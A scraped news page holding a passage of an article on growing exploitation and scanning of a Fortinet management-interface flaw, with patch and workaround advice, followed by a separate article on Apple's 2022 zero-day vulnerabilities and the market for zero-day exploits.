Exacerbating the concerns is the relatively low bar for exploiting the flaw. "This vulnerability is extremely easy for an attacker to exploit. All that is required is access to the management interface on a vulnerable system," Zach Hanley, chief attack engineer at Horizon3.ai, tells Dark Reading

**Increase in Scanning Activity for the Flaw**

Qualys isn't the only company observing increased vulnerability scanning for the flaw. James Horseman, exploit developer at Horizon3.ai says public data from GreyNoise—which tracks Internet scanning activity hitting security tools—shows the number of unique IPs using the exploit has grown from the single digits a few days ago, to over forty as of Oct. 14.

"We expect the number of unique IPs using this exploit to rapidly increase in the coming days," Horseman says. It is not hard for attackers to find vulnerable systems, he adds: A Shodan search for instance shows more than 100,000 Fortinet systems worldwide. 

"Not all of these will be vulnerable, but a large percentage will be," Horseman says.

Johannes Ullrich, dean of research at the SANS Institute, says he has observed scans associated with an older FortiGate vulnerability (CVE-2018-13379,) hitting SANS' honeypots in the days following disclosure of the new bug. He says there are two theories why that might be happening.

One of them is that an attacker may have tried to catch as many devices as possible that had not yet been patched for the old vulnerability. Given the attention the new vulnerability has gotten it is likely the old vulnerability will get patched as well now, he says.

"Or the attacker was trying to find Fortinet devices to exploit using the new vulnerability once it is available," he theorizes. "The old vulnerability scanner they had sitting on the shelf may still work to identify Fortinet devices."

**A Popular Attacker Target**

Concerns over vulnerabilities in Fortinet products are not new. The company's technologies—and those of others selling similar appliance—have been frequently targeted by attackers trying to gain an initial foothold on target network. 

Last November. The FBI, CISA and others issued an advisory warning of Iranian advanced persistent threat actors exploiting vulnerabilities in Fortinet and Microsoft products. A similar alert in April 2021 warned of attackers exploiting flaws in FortiOS to break into multiple government, commercial, and technology services.  

"These vulnerable devices are often edge devices, so an attacker could potentially use this vulnerability to gain access to an organization's internal networks to launch further attacks," Hanley says.

Fortinet itself has recommended that organizations that are able to, must update to the newly patched versions of FortiOS, FortiProxy and FortiSwitch Manager. For organizations that cannot immediately update, Fortinet has provided guidance on how to disable the HTTP/HTTPS interface or limit IP addresses that can reach the administrate interface of the affected products.

Hanley says organizations sometimes may not be able to patch due to the potential downtime associated with updating a device. "However, an organization should be able to apply \[the\] workaround to prevent this vulnerability from being exploited on unpatched machines by following Fortinet’s guidance."

Qualys' Jogi adds, "It is also crucial to review any attempts of exploit to identify systems that may have already been compromised. If an organization is unable to patch their systems, then they must disable the system admin interface immediately."

Concerns Over Fortinet Flaw Mount; PoC Released, Exploit Activity Grows

Such exploits sell for up to $10 million, making them the single most valuable commodity in the cybercrime underworld.

Over the past few years, there's been an increase in the number of attackers targeting Apple, especially with zero-day exploits. One major reason is that a zero-day exploit might just be the most valuable asset in a hacker's portfolio — and hackers know it. In 2022 alone, Apple has discovered seven zero-days and has followed up these discoveries with the required remedial updates. But it doesn't seem like the cat-and-mouse game will die anytime soon.

In 2021, the number of recorded zero-days overall was more than double the figures recorded in 2020, showing the highest level since tracking began in 2014, according to a repository maintained by Project Zero. MIT Technology Review attributed this rise to the "rapid global proliferation of hacking tools" and the willingness of powerful state and non-state groups to invest handsomely in the discovery and infiltration of these operating systems. Threat actors actively search for vulnerabilities, find a way to exploit them, then sell the information to the highest bidder.

**The Zero-Day Battles**

Suffering repeatedly from these infiltrations is the tech giant, Apple. After recovering from 12 recorded exploitations and remediation in 2021, Apple was welcomed into the new year of 2022 with two zero-day bugs in its operating systems and a WebKit flaw that could have leaked users' browsing data. Barely one month after releasing 23 security patches to fix those issues, another flaw was discovered — one that would allow attackers to infect users' devices when they process certain malicious Web content.

Fast-forward to August 17 and Apple revealed it had found two new vulnerabilities in its operating system: CVE-2022-32893 and CVE-2022-32894. The first vulnerability gives remote code execution (RCE) access to Apple's Safari Web browser kit, used by every iOS and macOS-enabled browser. The second, another RCE flaw, gives attackers complete and unrestricted access to the user's software and hardware. Both vulnerabilities affect most Apple devices — especially the iPhone 6 and later models, iPad Pro, iPad Air 2 onwards, iPad 5th generation and newer models, iPad mini 4 and newer versions, iPod touch (7th generation), and macOS Monterrey. Recognizing the risk level of such a threat, Apple recently released security updates to remediate these "actively exploited" vulnerabilities. This would be the fifth and sixth zero-day vulnerability exploited in Apple's systems just this year.

A couple weeks later, speculations about another zero-day exploit arose. One research team, in particular, said it found an ad on the Dark Web offering a supposedly weaponized version of an Apple vulnerability for over €2 million. While these speculations remain unconfirmed, soon after Apple released security updates for its seventh actively exploited zero-day vulnerability of 2022: CVE-2022-32917. According to the advisory, attackers could leverage this flaw to create applications that execute arbitrary code with kernel capabilities.

Zero-day exploits sell for up to $10 million, Digital Shadows' Photon Research Team reports, positioning them as the single most expensive commodity in the cybercrime underworld. With a bounty like that, the market for these exploits are bound to expand and further exacerbate cyber threats.

**Apple Isn't Alone in the Zero-Day Wild**

Apple is not alone in this struggle. In recent months, tech giants like Microsoft, Adobe, and Google have also had to patch zero-day vulnerabilities that have been actively exploited in the deep Web. A June article on Dark Reading noted that there had been "a total of 18 security vulnerabilities exploited as unpatched zero-days in the wild," and the number has since risen to 24. From all indications, attackers won't slow down anytime soon, especially as new variants of already patched zero days continue to surface.

As adversaries continue to find loopholes across systems and security architectures, enterprise leaders must keep prioritizing proactive defenses to stay ahead of attacks. One way to be proactive, according to Craig Harber, CTO at Fidelis Cybersecurity, is for organizations to map cyber terrains by gaining full visibility into their entire systems.

"Discovery is a ballet of strategy, inventory, and evaluation. Organizations need the ability to continuously discover, classify, and assess assets — including servers, enterprise IoT, laptops, desktops, shadow IT, and legacy systems," he notes.

Tag

#ios